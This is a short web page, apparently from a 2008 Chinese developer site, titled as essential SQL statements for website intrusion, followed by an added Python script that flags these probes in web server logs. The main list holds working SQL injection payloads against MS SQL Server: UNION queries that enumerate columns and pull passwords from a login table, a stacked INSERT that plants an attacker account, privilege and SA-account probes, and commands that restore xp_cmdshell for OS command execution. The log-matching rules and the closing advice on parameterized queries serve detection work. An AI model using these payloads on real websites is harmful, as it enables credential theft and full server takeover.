Essential SQL Statements for Website Intrusion (Classic Statements)

2008-10-27 16:51:14 Source: WEB开发网

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1= 1--
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN (login_id)-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

Check the server's patch level (an error response means the SP4 patch is installed)

and 1=(select @@VERSION)--

Check the privileges of the database connection account; a normal response shows that it holds the sysadmin server role.

and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

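Determine the database connection account. (When the connection uses the SA account, a normal response confirms that the connection account is SA.)

and sa=(SELECT System_user)--

and user_name()=dbo--

and 0(select user_name()--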

Check whether xp_cmdshell has been removed

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

If xp_cmdshell has been removed, restore it; restoring with an absolute path is supported

;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--

;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:
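
The probes listed above leave recognizable traces in web server request logs. The following is an added example, not part of the original page: a log triage sketch that flags each probe family after URL decoding. The rule names, function names and sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per probe family listed on this page (rule names are hypothetical).
RULES = {
    "having-1=1 schema error probe":
        re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "INFORMATION_SCHEMA column enumeration":
        re.compile(r"\bunion\s+select\b.*\binformation_schema\.columns\b", re.I | re.S),
    "version / role / account probe":
        re.compile(r"@@version|\bis_srvrolemember\s*\(|\bsystem_user\b|\buser_name\s*\(", re.I),
    "xp_cmdshell presence check or restore":
        re.compile(r"\bxp_cmdshell\b|\bsp_addextendedproc\b", re.I),
    "stacked INSERT":
        re.compile(r";\s*insert\s+into\b", re.I),
}

def normalize(query):
    """Decode URL encoding twice (double encoding is a common evasion),
    drop inline /* */ comments and collapse whitespace. For detection only:
    the decoded text must never be passed on to the application."""
    for _ in range(2):
        query = unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query)

def match_rules(request_line):
    """Return the names of all rules that match the query string of an
    HTTP request line such as 'GET /page.asp?id=1 HTTP/1.1'."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    _, _, query = target.partition("?")
    text = normalize(query)
    return [name for name, rx in RULES.items() if rx.search(text)]

# Constructed sample request lines (not taken from any real log).
SAMPLE = [
    "GET /news.asp?id=12 HTTP/1.1",
    "GET /news.asp?id=12%20group%20by%20users.id%20having%201=1-- HTTP/1.1",
    "GET /news.asp?id=12+and+1=(select+@@VERSION)-- HTTP/1.1",
    "GET /news.asp?id=12%253BEXEC%2520master.dbo.sp_addextendedproc%2520xp_cmdshell HTTP/1.1",
    "GET /search.asp?q=having+fun+with+sql HTTP/1.1",  # benign use of a keyword
]

if __name__ == "__main__":
    for line in SAMPLE:
        hits = match_rules(line)
        print("ALERT" if hits else "ok   ", line, hits)
```

Pattern matching of this kind is a triage aid for logs. It does not replace parameterized queries and a database login that lacks the sysadmin role.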


Editor: 爽爽